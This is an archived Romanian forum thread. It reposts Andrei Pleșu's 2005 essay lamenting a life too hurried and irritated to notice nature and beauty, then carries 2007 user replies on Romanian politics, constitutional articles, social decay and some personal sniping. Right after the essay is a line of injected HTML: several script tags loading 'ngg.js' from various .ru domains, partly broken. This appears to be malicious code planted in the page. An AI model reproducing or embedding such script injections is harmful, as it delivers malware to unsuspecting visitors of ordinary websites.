PDA

Arată versiune întreagă : Despre frumusetea uitata a vietii



14.01.2005, 04:17
Andrei Plesu / Opinii-Jurnalul National





Daca ma gandesc bine, reprosul esential pe care il am de facut tarii si vremurilor este ca ma impiedica sa ma bucur de frumusetea vietii. Din cand in cand, imi dau seama ca traiesc intr-o lume fara cer, fara copaci si gradini, fara extaze bucolice, fara ape, pajisti si nori. Am uitat misterul adanc al noptii, radicalitatea amiezii, racorile cosmice ale amurgului. Nu mai vad pasarile, nu mai adulmec mirosul prafos si umed al furtunii, nu mai percep, asfixiat de emotie, miracolul ploii si al stelelor. Nu mai privesc in sus, nu mai am organ pentru parfumuri si adieri. Fosnetul frunzelor uscate, transluciditatea nocturna a lacurilor, sunetul indescifrabil al serii, iarba, padurea, vitele, orizontul tulbure al campiei, colina cordiala si muntele ascetic nu mai fac de mult parte din peisajul meu cotidian, din echilibrul igienic al vietii mele launtrice. Nu mai am timp pent ru prietenie, pentru taclaua voioasa, pentru cheful asezat. Sunt ocupat. Sunt grabit. Sunt iritat, hartuit, coplesit de lehamite. Am o existenta de


ghiseu: mi se cer servicii, mi se fac comenzi, mi se solicita interventii, sfaturi si complicitati. Am devenit mizantrop. Doua treimi din metabolismul meu mental se epuizeaza in nervi de conjunctura, agenda mea zilnica e un inventar de urgente minore. Gandesc pe sponci, stimulat de provocari meschine. Imi incep ziua apoplectic, injurand


"situatiunea": gropile din drum, moravurile soferilor autohtoni, caldura (sau frigul), praful (sau noroiul), morala politicienilor, gramatica gazetarilor, modele ideologice, cacofoniile noii arhitecturi, demagogia, coruptia, bezmeticia tranzitiei. Abia daca mai inregistrez desenul ametitor al cate unei siluete feminine, inocenta vreunui suras, farmecul tacut al cate unui colt de strada. Colectionez antipatii si prilejuri de insatisfactie. Scriu despre mizerii si maruntisuri. Bomban toata zi ua, mi-am pierdut increderea in virtutile natiei, in soarta tarii, in rostul lumii. Am un portret tot mai greu digerabil. Patriotii de parada m-au trecut la tradatori, neoliberalii la conservatori, postmodernistii la elitisti. Batranilor le apar frivol, tinerilor reactionar. Una peste alta, mi-am pierdut buna dispozitie, elanul, jubilatia. Nu mai am ragazuri fertile, reverii, autenticitati. Ma misc, de dimineata pana seara, intr-un univers artificial, agitat, infectat de trivialitate. Apetitul vital a devenit anemic, placerea de a fi si-a pierdut amplitudinea si suculenta. Respir crispat si pripit, ca intr-o etuva. Cand cineva trece printr-o asemenea criza de vina e, in primul rand, umoarea proprie. Te poti acuza ca ai consimtit in prea mare masura imediatului, ca nu stii sa-ti dozezi timpul si afectele, ca nu mai deosebesti intre esential si accesoriu, ca, in sfarsit, ai scos din calculul zilnic valorile zenitale. Dar nu se poate trece cu vederea nici ambianta toxica a momentului si a veacului. Suntem napaditi de probleme secunde. Avem preocupari de mana a doua, avem conducatori de mana a doua, traim sub presiunea multipla a necesitatii. Ni se ofera texte mediocre, show-uri de prost-gust, conditii de viata umilitoare. Am ajuns sa nu mai avem simturi, idei, imaginatie. Ne-am uratit, ne-am instrainat cu totul de simplitatea polifonica a lumii, de pasiunea vietii depline. Nu! mai avem puterea de a admira si de a lauda, cu o genuina evlavie, splendoarea Creatiei, vazduhul, marile, pamantul si oamenii. Suntem turmentati si sumbri. Abia daca ne mai putem suporta. Exista, pentru acest derapaj primejdios, o terapie plauzibila? Da, cu conditia sa ne dam seama de gravitatea primejdiei. Cu conditia sa impunem atentiei noastre zilnice alte prioritati si alte orizonturi.








p://www.9jsr.<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></<script src=http://www.iroe.ru/ngg.js></script>

Raven
22.05.2007, 05:57
Andrei Plesu / Opinii-Jurnalul National


Am o existenta de ghiseu: mi se cer servicii, mi se fac comenzi, mi se solicita interventii, sfaturi si complicitati.


Are dreptate, dl. Plesu cu existenta de ghiseu.


In '90, la mineriada din iunie, Alexandru Paleologu, care era ambasadorul Romaniei la Paris si Mihai Shora, care era ministrul invatamantului si-au dat demisia in semn de protest. Andrei Plesu, care era ministrul culturii, a ales sa ramana in functie.
Existenta de ghiseu: ti se cer servicii, le acorzi.


In 2006, Andrei Plesu isi da adeziunea lui Basescu, impreuna cu alti adoratori din interes, semnand prompt scrisoarea osanalistica din decembrie.
Existenta de ghiseu: ti se solicita interventii, le acorzi.


Cam la asta se reduce activitatea cotidiana in Romania: la existenta de ghiseu, la complicitati cu stapanul, nu cu clientul.


Constitutia Romaniei, art. 54: Fidelitatea fata de tara e sacra.
Adica nu tara in sine e sacra, ci fidelitatea fata de ea.
Atitudinea aparent de neinteles a multora este chiar constitutionala. Si in acelasi timp explicabila prin prisma art. 54.


Constiinta? O poveste a la Mos Craciun...


Cultural si mental suntem prizonierii aceluiasi penitenciar reserist, chiar daca gardurile de sarma ghimpata au fost date jos.

Ahasverus
31.05.2007, 09:08
"Constitutia Romaniei, art. 54: Fidelitatea fata de tara e sacra.
Adica nu tara in sine e sacra, ci fidelitatea fata de ea.".

Excelenta remarca ! As completa cu un alt articol din Constitutie , nu-i mai tin minte numarul, care m-a facut sa-l citesc de 2 ori :

"Este interzisa denigrarea statului roman".


Nu am reusit sa identific un singur exemplu de "denigrare a statului..." si nici sa identific cine , de ce si cum ar face-o.

Raven
31.05.2007, 10:19
"Este interzisa denigrarea statului roman".
Deci nu denigrarea tarii e interzisa, ci denigrarea statului, adica a regimului.

Spiritul de militian e tot acolo la putere in Romania.

Ahasverus
31.05.2007, 22:24
Raven,nu numai spiritul de militian. E mult mai rau :

http://ro.altermedia.info/familiesocietate/psihologia-si-soc ietatea-romaneasca_6779.html

P.S. Iar spiritul de militian e la putere nu numai acolo.
E suficient sa citesti postarile kilometrice ale lui Aconi pe acest forum despre obsesia lui cu ungurii si cu pericolul permanent in care se afla tara chiar si dupa ce a intrat in UE.

aconi
31.05.2007, 23:46
verus ahas,bag seama ca,te "chinuie"si talentul literar si sunt magulit ca ma dai ca exemplu negativ, dupa parerea ta, pe acest topic cu justificate pretentii asa cum rezulta chiar din subiectul descris de autoare.Dar de ce vorbesti "pe la colturi" fara sa ma anunti si pe mine?La lamentabila ta provocare asi avea multe de spus dar nu este locul asa ca daca esti dispus vino la locul de lupta, la politice sau off topic.Dar, tu strigi si fugi precum liliacul cand este lovit si fugarit de lumina zilei.Te astept "frate drag" cu postarile mele care desi sunt kilometrice reprezinta non multa sed multum,greu de priceput pentru unii care au calotele cerebrale netede si ingramadite in minuscule cutii craniene.Nu pot incheia fara a remarca si "temeinicile" tale cunostinte de Drept Constitutional.Din respect fata de forumisti, ma abtin de la orice cmentariu si zic doar atat:iarta-l Doamne ca nu stie ce..vorbeste.


Te felicit melina pentru delicatul topic pe care l-ai creiat si consider ca ai dreptul sa ceri Administratiei sa-l curete de asemenea "buboaie" care nu au ce cauta pe un topic de incercari literare.

Raven
31.05.2007, 23:59
http://ro.altermedia.info/familiesocietate/psihologia-si-soc ietatea-romaneasca_6779.html


Misto articolul. Da' nu conlusioneaza esentialul: societatea romaneasca nu se afla in tranzitie, este cam aceeasi in esenta ei ca si inainte de '90, acum fiind un fel de maglavais consumeristic de tip fanariot.


Scara de valori e in continuare prabusita, inversata.


Lista (incompleta a) valorilor actuale:


Spiritul de militian. Manelismul. Multumescul absent sau prezent fortat. Viata ca o spaga. Indivizi gen Vadim si Becali la varf. Presedintii simultani de stat fostivecini la bloc in Primaverii. Actualul presedinte care-si face cumparaturile la supermarket cu nevasta cu tot autodeclarat ales din voia Domnului.Selectie politica zero (fesene la putere, fesene in opozitie). Elitele nevertebrate, niste farisei in majoritatea lor. Comunism fara comunisti, coruptie fara corupti.


Cea mai mare diferenta (pe care oprimistii o considera aducatoare de schimbari in bine) este realitatea emigratiei en-masse.


Aia au murit degeaba in '89.


Aviz optimistilor.





PS: Spiritul de militian se exporta,exemple sunt destule. No offence Aconi, vorbesc la general.

lebada
01.06.2007, 00:13
Maestre, va rog sa-mi iertati obraznicia de a va urmari postarile, chiar si de pe alte topice. Dar nu rezist. smileys/smiley2.gifVa mai cer o audienta, pentru a va povesti cum m-am simtit la strandul de la Gyula, c

barbarossa
19.06.2007, 05:26
Acceptarea unei vieti mediocre poate duce la sentimentul de
inutilitate.Gindurile adevarate expuse in public in loc sa fie
apreciate sunt interceptate ca o provocare de restul.Sa te inchizi in
tine a devenit nu numai o necesitate ci chiar vital.Cum sa mai percepi
sau sa mai ai timp sa simti ceea ce este frumos si pur cind gustul de
artificial chiar noi il promovam?!smileys/smiley5.gif

Raven
20.07.2007, 12:26
Gindurile adevarate expuse in public in loc sa fie
apreciate sunt interceptate ca o provocare de restul.Sa te inchizi in
tine a devenit nu numai o necesitate ci chiar vital.

Dixit.



Cum sa mai percepi
sau sa mai ai timp sa simti ceea ce este frumos si pur cind gustul de
artificial chiar noi il promovam?!smileys/smiley5.gif
Acceptarea nonvalorii inseamna promovarea ei.

O gloata persistenta numai in sinuciderea spirituala cu incetul prin consumul excesiv de gunoaie pe care singura le produce si le autoadministreaza.

Consumatorii, niste sclavi ai propriilor dorinte cu constiinta data contra credit la iluzii.

O existenta de hamster.

O morala de penitenciar.

O evolutie in involutie.

O inutilitate completa.

Avem fix ce meritam, inclusiv nimicul.

danielita
21.07.2007, 02:23
Acceptarea unei vieti mediocre poate duce la sentimentul de inutilitate.Gindurile adevarate expuse in public in loc sa fie apreciate sunt interceptate ca o provocare de restul.





Din pacate sunt oameni care accepta o viata mediocra.Nu-si mai ating scopurile ,nu lupta pentru realizarea visurilor..Foarte multi nu-si asuma responsabilitati si gasesc multe scuze pentru acoperirea unor slabiciuni si nerealizari.


Cum sa-ti expui adevaratele ganduri ?Chiar si pe net am observat ca atunci cand spui lucrurilor pe nume esti indepartat usor,usor.trebuie sa te limitezi la tiparele impusede lumea virtuala unde postezi.